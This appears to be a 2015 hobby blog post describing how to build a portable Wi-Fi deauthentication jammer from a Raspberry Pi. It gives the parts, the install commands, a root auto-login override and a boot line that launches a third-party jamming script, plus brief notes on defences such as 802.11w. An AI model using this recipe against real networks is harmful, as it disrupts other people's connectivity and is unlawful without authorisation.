---
layout: post
title: "Wifi Grenade"
date: 2015-04-09 05:39:49 EDT
comments: true
categories: [Projects]
---

[{% img center ../../../../../images/2015-04-09-wifi-grenade.png %}](../../../../../images/2015-04-09-wifi-grenade-full.png)

You can find the talk materials and slides [right
here](/talks/wifi-grenade/).

My latest mini-project involves deauth attacks of a portable nature. I
give you, the [Wifi Grenade](/talks/wifi-grenade/). Just be warned, this
talk is juvenile, script-kiddieish, and probably irresponsible. In this
post, I'll show you how to build it.

### DISCLAIMER:

To cover myself, I have to warn you of some things:

1. I'm standing on the shoulders of giants: The
hard work here has been done by other people.
2. Only use this on a network you are legally
allowed to attack. This shouldn't cause
permanent damage, but I'm not bailing you out if
you get busted.
3. This isn't technical, it's not impressive, at best
it's a way to see what deauth packets do, at
worst this is juvenile stupidity. Either way, don't
take it too seriously and have some fun.

### Instructions:

First, go shopping, you'll need some things (Amazon referral links below).

[$50] [Raspberry Pi 2 Model B with case](http://www.amazon.com/gp/product/B00T87CSAG/ref=as_li_tl?ie=UTF8&camp=1789&creative=390957&creativeASIN=B00T87CSAG&linkCode=as2&tag=thbloftowe-20&linkId=7N7DRE6KJH43P34M)

[$6] [8GB Micro SD Card](http://www.amazon.com/gp/product/B000WH6H1M/ref=as_li_tl?ie=UTF8&camp=1789&creative=390957&creativeASIN=B000WH6H1M&linkCode=as2&tag=thbloftowe-20&linkId=CWATBEKNQV7LGQ4E)

[$40] [Alfa Wireless Card (G/N 2W)](http://www.amazon.com/gp/product/B003YIFHJY/ref=as_li_tl?ie=UTF8&camp=1789&creative=390957&creativeASIN=B003YIFHJY&linkCode=as2&tag=thbloftowe-20&linkId=RSKIU3AJFAURUZ6M)

[$40] [Anker 16000mah Battery](http://www.amazon.com/gp/product/B00RVDJF82/ref=as_li_tl?ie=UTF8&camp=1789&creative=390957&creativeASIN=B00RVDJF82&linkCode=as2&tag=thbloftowe-20&linkId=I3LQAIDAEC4QAZBB)

When you have all of your gear, let's get the OS installed:

I'm using Arch Linux ARM for my Pi, [follow the instructions
here](http://archlinuxarm.org/platforms/armv7/broadcom/raspberry-pi-2) to
get the base OS installed, then run your updates with `pacman -Syyu`.

Next run `pacman -S scapy iw wireless_tools git` to pull the required
tools and libraries.

Next, clone [Dan McInerney's](http://danmcinerney.org/) fantastic [Wifi
Jammer](https://github.com/DanMcInerney/wifijammer) script from GitHub.
This will put the code into a directory called "wifijammer".

`git clone https://github.com/DanMcInerney/wifijammer`

Next, we have to set an auto-login. Create
`/etc/systemd/system/getty@tty1.service.d/override.conf` with the
following contents:

```
[Service]
ExecStart=
ExecStart=-/sbin/agetty --autologin root --noclear %I 38400 linux
```

Next, we have to set the jammer to run on boot. The simplest way to do
this is with `.bashrc`, modify the contents with the following:

```
exec /usr/bin/python2 /root/wifijammer/wifijammer.py -a 11:22:33:44:55:66
```

Now your system will boot directly into the root user and start the wifi
jammer. By default, the jammer is set to only jam 11:22:33:44:55:66.
Modify this script to specify which network you would like to jam.
Without `-a`, wifijammer.py will jam any and all networks it comes
across, be careful and only attack networks you are legally allowed to.

### How to stop this attack from working

* [802.11w – Protected Management Frames](https://en.wikipedia.org/wiki/IEEE_802.11w)
  * Not all management frames are protected, only some (deauth is protected)
* Some custom drivers will ignore deauth packets (And break 802.11 standards), this isn't a great solution (things break)
* wifijammer.py doesn't work on 5Ghz networks due to a bug, I imagine this will be fixed soon, however
* Encase your house/Office in a faraday cage :)
